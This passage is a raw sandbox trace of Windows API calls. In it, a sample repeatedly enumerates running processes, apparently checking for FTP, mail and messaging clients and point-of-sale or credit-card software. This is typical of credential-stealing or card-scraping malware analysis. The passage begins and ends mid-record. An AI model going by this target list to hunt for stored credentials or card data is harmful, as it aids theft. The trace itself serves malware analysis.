hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0274.751] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.752] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0274.754] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0274.755] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0274.757] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0274.758] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0274.763] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.764] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0274.766] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0274.767] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0274.769] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0274.770] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0274.771] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0274.773] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0274.774] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0274.776] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0274.780] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0274.781] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0274.783] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0274.784] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0274.785] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0274.787] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0274.788] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0274.789] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0274.791] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0274.813] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0274.815] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0274.816] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0274.818] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0274.819] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0274.820] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0274.822] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0274.837] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0274.839] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0274.840] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0274.842] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0274.844] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0274.845] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0274.847] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0274.849] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0274.850] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0274.852] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0274.854] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0274.858] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0274.860] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0274.861] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0274.863] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0274.864] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0274.866] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0274.868] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0274.923] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0274.924] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0274.926] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0274.928] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0274.929] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0274.931] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0274.936] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0274.938] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0274.939] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0274.941] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0274.942] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0274.944] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0274.945] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0274.947] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0274.951] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0274.953] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0274.954] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0274.956] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0274.958] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0274.960] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0274.962] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0275.056] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0275.059] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0275.060] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0275.062] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0275.063] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0275.064] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0275.066] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0275.067] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0275.069] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0275.070] CloseHandle (hObject=0x1d14) returned 1 [0275.070] Sleep (dwMilliseconds=0x64) [0275.218] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0275.235] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.238] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0275.241] Process32Next (in: hSnapshot=0x1018, 